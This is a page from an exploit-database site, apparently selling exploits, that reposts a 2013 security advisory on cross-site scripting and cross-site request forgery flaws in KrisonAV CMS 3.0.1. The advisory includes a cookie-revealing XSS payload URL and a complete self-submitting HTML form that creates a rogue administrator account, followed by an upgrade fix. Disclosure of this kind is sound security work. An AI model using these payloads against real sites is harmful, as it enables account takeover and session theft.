0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

KrisonAV CMS 3.0.1 - Multiple Vulnerabilities

Author

High-Tech Bridge SA

Risk

[

Security Risk High

]

0day-ID

0day-ID-20665

Category

web applications

Date add

18-04-2013

CVE

CVE-2013-2712
CVE-2013-2713

Platform

php

Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in KrisonAV CMS, which can be exploited to perform cross-site scripting and cross-site request forgery attacks.
 
 
1) Cross-Site Scripting (XSS) vulnerability in KrisonAV CMS: CVE-2013-2712
 
The vulnerability exists due to insufficient filtration of user-supplied data passed to "content" HTTP GET parameter via "/services/get_article.php" script. A remote attacker can trick a logged-in user to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of the vulnerable website.
 
The exploitation example below uses JavaScript "alert()" function to display user's cookies:
 
http://[host]/services/get_article.php?content=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
 
 
2) Сross-Site Request Forgery (CSRF) vulnerability in KrisonAV CMS: CVE-2013-2713
 
The vulnerability exists due to insufficient verification of the HTTP request origin in "/users_maint.html" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a new account with administrative privileges.
 
PoC (Proof-of-Concept) below will create a new account with login "username" and password "password":
 
 
<form action="http://[host]/users_maint.html?itemid=52&maint=1&ccsForm=users" method="post" name="f1">
<input type="hidden" name="disabledCheckBox" value="1">
<input type="hidden" name="username" value="username">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groups_index" value="20">
<input type="hidden" name="email" value="newuser@mail.com">
<input type="hidden" name="Button_Insert" value="Save">
<input type="submit" id="btn">
</form>
<script>
document.f1.submit();
</script>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Upgrade to KrisonAV CMS 3.0.2
 
More Information:
http://www.krisonav.com/articles_show.html?articles_id=release-notes

#  0day.today [2024-07-02]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

KrisonAV CMS 3.0.1 - Multiple Vulnerabilities

Report Error

Report Error